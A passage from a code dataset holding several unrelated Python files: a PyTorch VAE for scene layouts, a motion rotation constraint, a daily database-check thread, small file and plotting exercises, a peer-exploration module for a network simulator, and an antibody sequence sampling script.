self.rc4(rc4)\n output += self.relpos_14(relpos_14)\n \n output += self.rc5(rc5)\n output += self.relpos_15(relpos_15)\n output = self.tanh(output)\n output = self.second(output)\n output = self.tanh(output)\n return output\n \n\nclass WallEncoder(nn.Module): # Wall Encoder\n\n def __init__(self, feature_size, relpos_size, hidden_size):\n super(WallEncoder, self).__init__()\n self.left = nn.Linear(feature_size, hidden_size) \n self.right = nn.Linear(feature_size, hidden_size, bias=False) \n self.rightpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, left_input, right_input, relpos_right):\n output = self.left(left_input)\n output += self.right(right_input)\n output += self.rightpos(relpos_right)\n output = self.tanh(output)\n output = self.second(output)\n output = self.tanh(output)\n return output\n \n\nclass GRAINSEncoder(nn.Module):\n\n def __init__(self, config):\n super(GRAINSEncoder, self).__init__()\n self.boxEncoder = BoxEncoder(input_size = config.box_code_size, feature_size = config.feature_size)\n self.suppEncoder = SuppEncoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.coocEncoder = CoocEncoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.srndEncoder = SrndEncoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.r5Encoder = R5Encoder(feature_size = config.feature_size, 
feature_size2 = config.feature_size2, relpos_size = config.relpos_size, hidden_size = config.hidden_size2)\n self.wallEncoder = WallEncoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.sampler = Sampler(feature_size = config.feature_size2, hidden_size = config.hidden_size)\n\n def leafNode(self, box):\n return self.boxEncoder(box)\n\n def suppNode(self, left, right,relpos_right):\n return self.suppEncoder(left, right,relpos_right)\n\n def coocNode(self, left,right,relpos_right):\n return self.coocEncoder(left, right,relpos_right)\n\n def srndNode(self, left, center, relpos_center, right, relpos_right):\n return self.srndEncoder(left, center,relpos_center, right, relpos_right)\n \n def r5Node(self, rc1,rc2,relpos_12, rc3, relpos_13, rc4, relpos_14, rc5, relpos_15):#,w3,r13,w4,r14):\n return self.r5Encoder(rc1,rc2,relpos_12, rc3, relpos_13, rc4, relpos_14, rc5, relpos_15)#,w3,r13,w4,r14)\n\n def wallNode(self, left, right, relpos_right):\n return self.wallEncoder(left, right, relpos_right)\n \n def sampleLayer(self, feature):\n return self.sampler(feature)\n\n \ndef encode_structure_fold(fold, tree):\n \n def encode_node(node): \n if node.is_leaf():\n return fold.add(u'leafNode', node.box)\n \n elif node.is_supp():\n left = encode_node(node.left)\n right = encode_node(node.right)\n return fold.add(u'suppNode', left, right, node.relpos_right)\n \n elif node.is_cooc():\n left = encode_node(node.left)\n right = encode_node(node.right)\n return fold.add(u'coocNode', left, right, node.relpos_right)\n \n elif node.is_srnd():\n left = encode_node(node.left)\n center = encode_node(node.center)\n right = encode_node(node.right)\n return fold.add(u'srndNode', left, center, node.relpos_center, right, node.relpos_right) \n \n elif node.is_root5():\n rc1 = encode_node(node.left)\n rc2 = encode_node(node.center)\n rc3 = encode_node(node.right)\n rc4 = encode_node(node.root4)\n rc5 = encode_node(node.root5)\n return fold.add(u'r5Node',rc1,rc2,node.relpos_center, rc3, node.relpos_right, rc4, node.relpos3, rc5, node.relpos4)#,w3,node.relpos_right,w4,node.relpos_wall4)\n \n elif node.is_wall():\n left = encode_node(node.left)\n right = encode_node(node.right)\n return fold.add(u'wallNode', left, right, node.relpos_right)\n \n encoding = encode_node(tree.root)\n return fold.add(u'sampleLayer', encoding)\n\n#########################################################################################\n## Decoder\n#########################################################################################\n\n\nclass NodeClassifier(nn.Module):\n\n def __init__(self, feature_size, hidden_size):\n super(NodeClassifier, self).__init__()\n self.mlp1 = nn.Linear(feature_size, hidden_size)\n self.tanh = nn.Tanh()\n self.mlp2 = nn.Linear(hidden_size, 5) # there are 5 kinds of encoders , BOX, SUPP, CO-OC, SRND and WALL\n #self.softmax = nn.Softmax()\n\n def forward(self, input_feature):\n output = self.mlp1(input_feature)\n output = self.tanh(output)\n output = self.mlp2(output)\n #output = self.softmax(output)\n return output\n\nclass SampleDecoder(nn.Module):\n u\"\"\" Decode a randomly sampled noise into a feature vector \"\"\"\n def __init__(self, feature_size, hidden_size):\n super(SampleDecoder, self).__init__()\n self.mlp1 = nn.Linear(feature_size, hidden_size)\n self.mlp2 = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n \n def forward(self, input_feature):\n output = self.tanh(self.mlp1(input_feature))\n output = 
self.tanh(self.mlp2(output))\n return output\n\n\nclass SuppDecoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size,relpos_size, hidden_size):\n super(SuppDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, hidden_size)\n self.mlp_left = nn.Linear(hidden_size, feature_size)\n self.mlp_right = nn.Linear(hidden_size, feature_size)\n self.mlp_rightpos = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n left_code = self.mlp_left(vector) \n left_code = self.tanh(left_code)\n right_code = self.mlp_right(vector)\n right_code = self.tanh(right_code)\n right_pos = self.mlp_rightpos(vector)\n right_pos = self.tanh(right_pos)\n return left_code, right_code, right_pos\n\n\t\t\nclass CoocDecoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size,relpos_size, hidden_size):\n super(CoocDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, hidden_size)\n self.mlp_left = nn.Linear(hidden_size, feature_size)\n self.mlp_right = nn.Linear(hidden_size, feature_size)\n self.mlp_rightpos = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n left_code = self.mlp_left(vector)\n left_code = self.tanh(left_code)\n right_code = self.mlp_right(vector)\n right_code = self.tanh(right_code)\n right_pos = self.mlp_rightpos(vector)\n right_pos = self.tanh(right_pos)\n return left_code, right_code, right_pos\n\nclass SrndDecoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size,relpos_size, hidden_size):\n super(SrndDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, hidden_size)\n self.mlp_left = nn.Linear(hidden_size, feature_size)\n self.mlp_center = nn.Linear(hidden_size, feature_size)\n self.mlp_centerpos = nn.Linear(hidden_size, relpos_size)\n self.mlp_right = nn.Linear(hidden_size, feature_size)\n self.mlp_rightpos = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n left_code = self.mlp_left(vector) \n left_code = self.tanh(left_code)\n center_code = self.mlp_center(vector)\n center_code = self.tanh(center_code)\n center_pos = self.mlp_centerpos(vector)\n center_pos = self.tanh(center_pos)\n right_code = self.mlp_right(vector)\n right_code = self.tanh(right_code)\n right_pos = self.mlp_rightpos(vector)\n right_pos = self.tanh(right_pos)\n return left_code, center_code, center_pos, right_code, right_pos\n\nclass R5Decoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. 
right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size, feature_size2, relpos_size, hidden_size):\n super(R5Decoder, self).__init__()\n self.mlp = nn.Linear(feature_size2, hidden_size)\n self.mlp_rc1 = nn.Linear(hidden_size, feature_size)\n self.mlp_rc2 = nn.Linear(hidden_size, feature_size)\n self.mlp_rc3 = nn.Linear(hidden_size, feature_size)\n self.mlp_rc4 = nn.Linear(hidden_size, feature_size)\n self.mlp_rc5 = nn.Linear(hidden_size, feature_size)\n self.mlp_relpos_12 = nn.Linear(hidden_size, relpos_size)\n self.mlp_relpos_13 = nn.Linear(hidden_size, relpos_size)\n self.mlp_relpos_14 = nn.Linear(hidden_size, relpos_size)\n self.mlp_relpos_15 = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n rc1 = self.mlp_rc1(vector) \n rc1 = self.tanh(rc1)\n rc2 = self.mlp_rc2(vector)\n rc2 = self.tanh(rc2)\n relpos_12 = self.mlp_relpos_12(vector)\n relpos_12 = self.tanh(relpos_12)\n \n rc3 = self.mlp_rc3(vector)\n rc3 = self.tanh(rc3)\n relpos_13 = self.mlp_relpos_13(vector)\n relpos_13 = self.tanh(relpos_13)\n \n rc4 = self.mlp_rc4(vector)\n rc4 = self.tanh(rc4)\n relpos_14 = self.mlp_relpos_14(vector)\n relpos_14 = self.tanh(relpos_14)\n \n rc5 = self.mlp_rc5(vector)\n rc5 = self.tanh(rc5)\n relpos_15 = self.mlp_relpos_15(vector)\n relpos_15 = self.tanh(relpos_15)\n \n return rc1,rc2,relpos_12,rc3,relpos_13,rc4,relpos_14,rc5,relpos_15#,w3,r13,w4,r14\n\n\nclass WallDecoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size,relpos_size, hidden_size):\n super(WallDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, hidden_size)\n self.mlp_left = nn.Linear(hidden_size, feature_size)\n self.mlp_right = nn.Linear(hidden_size, feature_size)\n self.mlp_rightpos = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n left_code = self.mlp_left(vector) \n left_code = self.tanh(left_code)\n right_code = self.mlp_right(vector)\n right_code = self.tanh(right_code)\n right_pos = self.mlp_rightpos(vector)\n right_pos = self.tanh(right_pos)\n return left_code, right_code, right_pos\n\n\n\nclass BoxDecoder(nn.Module):\n\n def __init__(self, feature_size, box_size):\n super(BoxDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, box_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n return vector\n \nclass GRAINSDecoder(nn.Module):\n def __init__(self, config):\n super(GRAINSDecoder, self).__init__()\n self.box_decoder = BoxDecoder(feature_size = config.feature_size, box_size = config.box_code_size)\n self.supp_decoder = SuppDecoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.cooc_decoder = CoocDecoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.srnd_decoder = SrndDecoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.r5_decoder = R5Decoder(feature_size = config.feature_size, feature_size2 = config.feature_size2, relpos_size = config.relpos_size, hidden_size = config.hidden_size2)\n self.wall_decoder = WallDecoder(feature_size = config.feature_size, 
relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.sample_decoder = SampleDecoder(feature_size = config.feature_size2, hidden_size = config.hidden_size)\n self.node_classifier = NodeClassifier(feature_size = config.feature_size, hidden_size = config.hidden_size)\n self.mseLoss = nn.MSELoss() \n self.creLoss = nn.CrossEntropyLoss() \n \n def boxDecoder(self, feature):\n return self.box_decoder(feature)\n\n def SuppDecoder(self, feature):\n return self.supp_decoder(feature)\n\n def CoocDecoder(self, feature):\n return self.cooc_decoder(feature)\n\n def SrndDecoder(self, feature):\n return self.srnd_decoder(feature)\n \n def R5Decoder(self,feature):\n return self.r5_decoder(feature)\n \n def WallDecoder(self,feature):\n return self.wall_decoder(feature)\n \n def sampleDecoder(self, feature):\n return self.sample_decoder(feature)\n \n def nodeClassifier(self, feature):\n return self.node_classifier(feature)\n\n def boxLossEstimator(self, box_feature, gt_box_feature): #gt_box_feature is the ground truth for the box feature\n return torch.cat([self.mseLoss(b, gt).mul(0.5) for b, gt in izip(box_feature, gt_box_feature)], 0)\n \n def relposLossEstimator(self, relpos_feature, gt_relpos_feature): #gt_relpos_feature is the ground truth for the relpos feature\n return torch.cat([self.mseLoss(r, gt).mul(0.5) for r, gt in izip(relpos_feature, gt_relpos_feature)], 0)\n\n def classifyLossEstimator(self, label_vector, gt_label_vector):\n return torch.cat([self.creLoss(l.unsqueeze(0), gt).mul(0.5) for l, gt in izip(label_vector, gt_label_vector)], 0)\n\n def vectorAdder(self, v1, v2):\n return v1.add_(v2)\n \ndef decode_structure_fold(fold, tree, feature):\n \n def decode_node_box(node, feature):\n \n if node.is_leaf():\n box = fold.add(u'boxDecoder', feature)\n recon_loss = fold.add(u'boxLossEstimator', box, node.box)\n label = fold.add(u'nodeClassifier', feature)\n label_loss = fold.add(u'classifyLossEstimator', label, node.label)\n return fold.add(u'vectorAdder', recon_loss, label_loss)\n \n elif node.is_supp():\n left, right,relpos_right = fold.add(u'SuppDecoder', feature).split(3)\n left_loss = decode_node_box(node.left, left)\n right_loss = decode_node_box(node.right, right)\n right_relpos_loss = fold.add(u'relposLossEstimator', relpos_right, node.relpos_right)\n label = fold.add(u'nodeClassifier', feature)\n label_loss = fold.add(u'classifyLossEstimator', label, node.label)\n right_loss = fold.add(u'vectorAdder', right_loss, right_relpos_loss)\n loss = fold.add(u'vectorAdder', left_loss, right_loss)\n return fold.add(u'vectorAdder', loss, label_loss)\n \n elif node.is_cooc():\n left, right,relpos_right = fold.add(u'CoocDecoder', feature).split(3)\n left_loss = decode_node_box(node.left, left)\n right_loss = decode_node_box(node.right, right)\n right_relpos_loss = fold.add(u'relposLossEstimator', relpos_right, node.relpos_right)\n label = fold.add(u'nodeClassifier', feature)\n label_loss = fold.add(u'classifyLossEstimator', label, node.label)\n right_loss = fold.add(u'vectorAdder', right_loss, right_relpos_loss)\n loss = fold.add(u'vectorAdder', left_loss, right_loss)\n return fold.add(u'vectorAdder', loss, label_loss)\n \n elif node.is_srnd():\n left, center,relpos_center, right,relpos_right = fold.add(u'SrndDecoder', feature).split(5)\n left_loss = decode_node_box(node.left,left)\n center_loss = decode_node_box(node.center, center)\n center_relpos_loss = fold.add(u'relposLossEstimator', relpos_center, node.relpos_center)\n right_loss = decode_node_box(node.right, right)\n 
right_relpos_loss = fold.add(u'relposLossEstimator', relpos_right, node.relpos_right)\n label = fold.add('nodeClassifier', feature)\n label_loss = fold.add('classifyLossEstimator', label, node.label)\n center_loss = fold.add('vectorAdder', center_loss, center_relpos_loss)\n right_loss = fold.add('vectorAdder', right_loss, right_relpos_loss)\n loss = fold.add('vectorAdder', left_loss, center_loss)\n loss = fold.add('vectorAdder', loss, right_loss)\n return fold.add('vectorAdder', loss, label_loss) \n \n elif node.is_wall():\n left, right,relpos_right = fold.add(u'WallDecoder', feature).split(3)\n left_loss = decode_node_box(node.left, left)\n right_loss = decode_node_box(node.right, right)\n right_relpos_loss = fold.add(u'relposLossEstimator', relpos_right, node.relpos_right)\n label = fold.add(u'nodeClassifier', feature)\n label_loss = fold.add(u'classifyLossEstimator', label, node.label-1)\n right_loss = fold.add(u'vectorAdder', right_loss, right_relpos_loss)\n loss = fold.add(u'vectorAdder', left_loss, right_loss)\n return fold.add(u'vectorAdder', loss, label_loss)\n \n \n feature = fold.add(u'sampleDecoder', feature) \n node = tree.root\n rc1,rc2,relpos_12,rc3,relpos_13,rc4,relpos_14,rc5,relpos_15 = fold.add(u'R5Decoder',feature).split(9)\n rc1_loss = decode_node_box(node.left,rc1)\n rc2_loss = decode_node_box(node.center,rc2)\n relpos_12_loss = fold.add(u'relposLossEstimator', relpos_12, node.relpos_center)\n rc2_loss = fold.add('vectorAdder',rc2_loss, relpos_12_loss)\n \n rc3_loss = decode_node_box(node.right,rc3)\n relpos_13_loss = fold.add(u'relposLossEstimator', relpos_13, node.relpos_right)\n rc3_loss = fold.add('vectorAdder',rc3_loss, relpos_13_loss)\n \n rc4_loss = decode_node_box(node.root4, rc4)\n relpos_14_loss = fold.add(u'relposLossEstimator', relpos_14, node.relpos3)\n rc4_loss = fold.add('vectorAdder',rc4_loss, relpos_14_loss)\n \n rc5_loss = decode_node_box(node.root5, rc5)\n relpos_15_loss = fold.add(u'relposLossEstimator', relpos_15, node.relpos4)\n rc5_loss = fold.add('vectorAdder',rc5_loss, relpos_15_loss)\n w12_loss = fold.add('vectorAdder',rc1_loss, rc2_loss)\n w13_loss = fold.add('vectorAdder',w12_loss, rc3_loss)\n w14_loss = fold.add('vectorAdder',w13_loss, rc4_loss)\n w15_loss = fold.add('vectorAdder',w14_loss, rc5_loss)\n return w15_loss\n\n#########################################################################################\n## Functions for model testing: Decode a root code into a tree structure of boxes\n#########################################################################################\ndef vrrotvec2mat(rotvector):\n s = math.sin(rotvector[3])\n c = math.cos(rotvector[3])\n t = 1 - c\n x = rotvector[0]\n y = rotvector[1]\n z = rotvector[2]\n m = torch.FloatTensor([[t*x*x+c, t*x*y-s*z, t*x*z+s*y], [t*x*y+s*z, t*y*y+c, t*y*z-s*x], [t*x*z-s*y, t*y*z+s*x, t*z*z+c]]).cuda()\n return m\n\ndef decode_structure(model, feature):\n decode = model.sampleDecoder(feature)\n nodecount = 1;\n stack = []\n rplist = []\n boxes = []\n kids = []\n attachs = []\n \n rc1,rc2,relpos_12,rc3,relpos_13,rc4,relpos_14,rc5,relpos_15 = model.R5Decoder(decode)\n stack.append(rc1)\n stack.append(rc2)\n rplist.extend(relpos_12)\n stack.append(rc3)\n rplist.extend(relpos_13)\n stack.append(rc4)\n rplist.extend(relpos_14)\n stack.append(rc5)\n rplist.extend(relpos_15)\n kids.append([4,nodecount+1,nodecount+2,nodecount+3,nodecount+4,nodecount+5])\n nodecount = nodecount+5\n \n while len(stack) > 0:\n f = stack[0]\n stack = stack[1:]\n \n label_prob = model.nodeClassifier(f)\n _, 
label = torch.max(label_prob, 1)\n label = label.data # classify\n \n if label[0] == 1:\n #print u\"support node.\"\n left, right,relpos_right = model.SuppDecoder(f)\n stack.append(left)\n stack.append(right)\n kids.append([1,nodecount+1,nodecount+2,0,0,0]) \n nodecount = nodecount+2\n rplist.extend(relpos_right)\n if label[0] == 2:\n #print u\"group node.\"\n left, right,relpos_right = model.CoocDecoder(f)\n stack.append(left)\n stack.append(right)\n kids.append([2,nodecount+1,nodecount+2,0,0,0])\n nodecount = nodecount+2\n rplist.extend(relpos_right) \n if label[0] == 3:\n #print u\"surround node.\"\n left, center,relpos_center, right, relpos_right = model.SrndDecoder(f)\n stack.append(left)\n stack.append(center)\n rplist.extend(relpos_center)\n stack.append(right)\n kids.append([3,nodecount+1,nodecount+2,nodecount+3,0,0])\n nodecount = nodecount+3\n rplist.extend(relpos_right)\n \n if label[0] == 4:\n #print u\"wall node.\"\n rc1,rc2,relpos_12 = model.WallDecoder(f)\n stack.append(rc1)\n stack.append(rc2)\n rplist.extend(relpos_12)\n kids.append([5,nodecount+1,nodecount+2,0,0,0])\n nodecount = nodecount+2 \n \n if label[0] == 0:\n #print u\"box node.\"\n reBox = model.boxDecoder(f)\n bo = reBox.data.cpu().numpy()\n la = bo[0]\n la = la[3:];\n #print u\"label:\",la.argmax()\n boxes.extend(reBox)\n kids.append([0,0,0,0,0,0])\n \n #print u\"Kids are....\", kids\n return boxes, rplist, kids","sub_path":"4-training/grainsmodel_vae.py","file_name":"grainsmodel_vae.py","file_ext":"py","file_size_in_byte":28248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"121972955","text":"__author__ = 'hadu01'\n\nfrom keyframe_constraint_base import KeyframeConstraintBase\nimport numpy as np\nfrom .....external.transformations import euler_matrix, \\\n quaternion_matrix\nLEN_ROOT_POSITION = 3\nLEN_QUAT = 4\n\n\nclass JointRotationConstraint(KeyframeConstraintBase):\n def __init__(self, skeleton, constraint_desc, precision, weight_factor=1.0):\n super(JointRotationConstraint, self).__init__(constraint_desc,\n precision,\n weight_factor)\n self.skeleton = skeleton\n self.joint_name = constraint_desc['joint_name']\n self.rotation_type = constraint_desc['rotation_type']\n self.rotation_constraint = constraint_desc['rotation_constraint']\n self.frame_idx = constraint_desc['frame_index']\n if self.rotation_type == \"euler\":\n rad_angles = map(np.deg2rad, self.rotation_constraint)\n self.constraint_rotmat = euler_matrix(rad_angles[0],\n rad_angles[1],\n rad_angles[2],\n axes='rxyz')\n elif self.rotation_type == \"quaternion\":\n quat = np.asarray(self.rotation_constraint)\n quat /= np.linalg.norm(quat)\n self.constraint_rotmat = quaternion_matrix(quat)\n else:\n raise ValueError('Unknown rotation type!')\n\n def evaluate_motion_sample(self, aligned_quat_frames):\n \"\"\"\n Extract the rotation angle of given joint at certain frame, to compare with\n constrained rotation matrix\n\n \"\"\"\n joint_idx = self.skeleton.node_name_frame_map.keys().index(self.joint_name)\n quat_value = aligned_quat_frames[self.frame_idx][LEN_ROOT_POSITION + joint_idx*LEN_QUAT :\n LEN_ROOT_POSITION + (joint_idx + 1) * LEN_QUAT]\n quat_value = np.asarray(quat_value)\n quat_value /= np.linalg.norm(quat_value)\n rotmat = quaternion_matrix(quat_value)\n diff_mat = self.constraint_rotmat - rotmat\n tmp = np.ravel(diff_mat)\n error = np.linalg.norm(tmp)\n return 
error\n","sub_path":"python_src/morphablegraphs/motion_generator/constraints/spatial_constraints/keyframe_constraints/joint_rotation_constraint.py","file_name":"joint_rotation_constraint.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"7631505","text":"import threading\nimport time\nimport backdbcheck\nimport sys\n\n\n\nclass dbcheckc(threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n def run(self):\n print(\"Background thread initialized\")\n lastchecktime = time.time()-86400\n try:\n while(True):\n if((time.time()-lastchecktime)>=86400): #checking if a day had passed\n lastchecktime=time.time()\n backdbcheck.backdbcheck()\n\n except KeyboardInterrupt:\n sys.exit(0)\n","sub_path":"dbcheck.py","file_name":"dbcheck.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"606275234","text":"file1 = open (\"doc.txt\", \"w\")\r\nL = [\"Hello I am a file \\n\",\"Where you need to return the data string \\n\",\"Which is of even length \\n\"]\r\nfile1.writelines(L)\r\nfile1.close()\r\nfile1 = open(\"doc.txt\", \"r+\")\r\ntext = file1.readlines()\r\nwords = []\r\nfor line in text:\r\n words += line.split(\" \")\r\n words.remove(\"\\n\")\r\neven_len_string = []\r\nfor i in words:\r\n if len(i) % 2 == 0:\r\n even_len_string.append(i)\r\n# print(even_len_string)\r\nlistToStr = ' '.join([str(elem) for elem in even_len_string])\r\n# print(listToStr)\r\nfile1.close()\r\nwith open(\"doc.txt\", \"a\") as document1:\r\n f = [\"Even length string is : \\n\",listToStr]\r\n document1.writelines(f)","sub_path":"Task5/ques6.py","file_name":"ques6.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"255870839","text":"import matplotlib.pylab as plt\r\n\r\nnum_range = int(input(\"Enter number range 1..N : \"))\r\npower = int(input(\"Enter power N^x : \" ))\r\n\r\nx_values = list(range(1, num_range + 1))\r\ny_values = [x**power for x in x_values]\r\n\r\nplt.scatter(x_values, y_values, c=y_values, cmap=plt.cm.Blues, \r\n edgecolor='none', s=40)\r\n\r\n# Set range for each axis\r\nplt.axis([0, num_range + 2, 0, (num_range + 2) ** power])\r\n\r\n# Set chart title and label axis.\r\nplt.title(\"Square Numbers\", fontsize=24)\r\nplt.xlabel(\"Value\", fontsize=14)\r\nplt.ylabel(\"Square of Value\", fontsize=14)\r\n\r\n# Set size of tick labels.\r\nplt.tick_params(axis='both', which='major', labelsize=14)\r\n\r\nplt.show()","sub_path":"Data_Visualization/scatter_squares.py","file_name":"scatter_squares.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"476634828","text":"import numpy as np\nfrom collections import defaultdict\nimport formatter\nimport sys\n\nclass DepletingPool:\n def __init__(self, i, known_peers, log):\n self.hist_explored_peers = {} # key is peer, value is the last time in mc table\n self.counter = 0\n self.id = i\n self.known_peers = set(known_peers)\n self.log = log\n self.dead_loop_breaker = 0\n\n def get_exploring_peers(self, curr_peers, keep_peers, num_explore, oracle, curr_out):\n self.dead_loop_breaker += 1\n if self.dead_loop_breaker > 2:\n print('called get_exploring_peers more than 2. 
Cannot explore new peers even in a whole pool. Choose a random non-outgoing peer to explore', self.dead_loop_breaker)\n            cands = self.known_peers.difference(curr_out)\n            explores = list(np.random.choice(list(cands), num_explore, replace=False))\n            return [int(i) for i in explores]\n\n            # sys.exit(1)\n        for p in curr_peers + keep_peers:\n            self.hist_explored_peers[p] = self.counter\n        pools = self.known_peers\n        cands = list(pools.difference(self.hist_explored_peers.keys()))\n        # print(self.counter, 'seen', len(self.hist_explored_peers), ' peers', sorted(list(self.hist_explored_peers.keys())))\n        if len(cands) >= num_explore:\n            explores = []\n            np.random.shuffle(cands)\n            for i in cands:\n                if len(oracle.can_i_connect(self.id, [i])) == 0:\n                    explores.append(i)\n                    if num_explore == len(explores):\n                        break\n\n            if num_explore == len(explores):\n                # explores = list(np.random.choice(list(cands), num_explore, replace=False))\n                formatter.printt('\\t\\tExplore(deplet full):\\t\\t{}\\n'.format(sorted(explores)), self.log)\n                self.counter += 1\n                self.dead_loop_breaker = 0\n                return explores\n            else:\n                num_explore -= len(explores)\n                self.hist_explored_peers.clear()\n                new_pool_explore = self.get_exploring_peers(curr_peers, keep_peers, num_explore, oracle, curr_out)\n                formatter.printt('\\t\\tExplore(deplet insu oracle):\\t\\t{}\\n'.format(sorted(explores+new_pool_explore)),self.log)\n                self.counter += 1\n                self.dead_loop_breaker = 0\n                return explores + new_pool_explore\n\n        else:\n            explores = []\n            for i in cands:\n                if len(oracle.can_i_connect(self.id, [i])) == 0:\n                    explores.append(i)\n                    if num_explore == len(explores):\n                        break\n\n            num_explore -= len(cands)\n            self.hist_explored_peers.clear()\n            new_pool_explore = self.get_exploring_peers(curr_peers, keep_peers, num_explore, oracle, curr_out)\n            # print('\\t\\tExplore(deplet):\\t\\t'+str(sorted(explores+new_pool_explore)))\n            formatter.printt('\\t\\tExplore(deplet insu cand):\\t\\t{}\\n'.format(sorted(explores+new_pool_explore)),self.log)\n            self.counter += 1\n            self.dead_loop_breaker = 0\n            return explores + new_pool_explore\n\nclass RandomExplorer:\n    def __init__(self, i, known_peers, log):\n        self.id = i\n        self.known_peers = set(known_peers)\n        self.log = log\n\n    def get_exploring_peers(self, curr_peers, keep_peers, num_explore, oracle):\n        pools = self.known_peers\n        cands = list(pools.difference(curr_peers))\n        explores = []\n        for i in np.random.permutation(cands):\n            if len(oracle.can_i_connect(self.id, [i])) == 0:\n                explores.append(i)\n                if num_explore == len(explores):\n                    break\n        if num_explore != len(explores):\n            print('cannot find sufficient random nodes')\n            sys.exit(1)\n        return explores\n\n\nclass GreedyExplorer:\n    def __init__(self, node_id):\n        self.subset_record = defaultdict(dict) # key is subset, value maps peers covered through me to a count\n        self.peer_record = {} # contributors who give good records\n        self.id = node_id\n\n    def select_comparison(self):\n        pass\n\n    def get_exploring_peers(self, H, nodes, plus_mask, curr_peers, keep_peers, num_explore):\n        pass\n","sub_path":"core/explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"216646813","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 24 09:14:43 2021\n\n@author: magoncal\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom glob import glob\nimport random\n\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\n#data = 
pd.concat([pd.read_csv(file, header=1) for file in glob('csv/*/*')])\n#data.to_csv('antibody_pairing.csv', index=False)\ndata = pd.read_csv('antibody_pairing.csv').reset_index()\ndata['index'] = \"paired_\"+data['index'].astype(str)\n\n# Generating short sample to test the model with anarci alignment\nrandom.seed(12345)\nclass_ids = random.sample(range(0, len(data)), 100)\n\ndata_heavy = data.loc[class_ids, ['index', 'sequence_alignment_aa_heavy']].values.tolist()\ndata_light = data.loc[class_ids, ['index', 'sequence_alignment_aa_light']].values.tolist()\n\nheavy_lst = []\ni=1\nfor item in data_heavy:\n    heavy_lst.append(SeqRecord(Seq(item[1]), id=str(item[0]), name=str(item[0]), description=\"\"))\n    if i%50==0 and i>0:\n        with open('heavy_chain_'+str(i)+'.fasta', 'w') as handle:\n            SeqIO.write(heavy_lst, handle, \"fasta\")\n        heavy_lst = []\n    i+=1\n\nlight_lst = []\ni=1\nfor item in data_light:\n    light_lst.append(SeqRecord(Seq(item[1]), id=str(item[0]), name=str(item[0]), description=\"\"))\n    if i%50==0 and i>0:\n        with open('light_chain_'+str(i)+'.fasta', 'w') as handle:\n            SeqIO.write(light_lst, handle, \"fasta\")\n        light_lst = []\n    i+=1\n    \n# Loading anarci data\nanarci_heavy = pd.concat([pd.read_csv(file) for file in glob('anarci/*heavy*')])\nanarci_light = pd.concat([pd.read_csv(file) for file in glob('anarci/*light*')])\n\ncols = [\"Id\"]+list(anarci_heavy.columns)[-145:]\nanarci_heavy = anarci_heavy.loc[:, cols]\nfor category in cols[1:]:\n    anarci_heavy[category] = 